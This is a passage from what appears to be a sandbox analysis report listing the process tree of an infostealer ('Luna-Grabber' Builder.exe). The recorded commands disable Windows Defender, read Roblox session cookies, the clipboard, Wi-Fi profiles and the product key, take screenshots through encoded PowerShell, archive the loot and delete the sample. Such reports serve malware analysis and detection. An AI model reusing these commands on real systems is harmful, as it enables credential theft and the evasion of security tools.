    PID:5496
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()"
      4⤵
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5484
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5704
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:5780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3232
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5472
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4380
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1100
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:224
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3236
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5704
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5772
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2468
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jqfaievi\jqfaievi.cmdline"
        5⤵
        
        PID:1716
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF781.tmp" "c:\Users\Admin\AppData\Local\Temp\jqfaievi\CSC1B6B7D75DB0B4E518BCB6A8CEB8731FF.TMP"
        6⤵
        
        PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4528
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:6032
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5736
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:924
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2996
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:8
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5608
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4860
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2444
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:388
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\4rVLW.zip" *"
    3⤵
    PID:2196
  - - C:\Users\Admin\AppData\Local\Temp\_MEI36122\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI36122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\4rVLW.zip" *
      4⤵
      Executes dropped EXE
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:8
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:6052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3664
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2332

C:\Users\Admin\Desktop\Builder.exe
"C:\Users\Admin\Desktop\Builder.exe"
1⤵
- Executes dropped EXE
PID:6124
- C:\Users\Admin\Desktop\Builder.exe
  "C:\Users\Admin\Desktop\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Builder.exe'"
    3⤵
    PID:472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3632
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()""
    3⤵
    PID:4748
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()"
      4⤵
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4240
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6140
- - C:\Windows\system32\cmd.exe
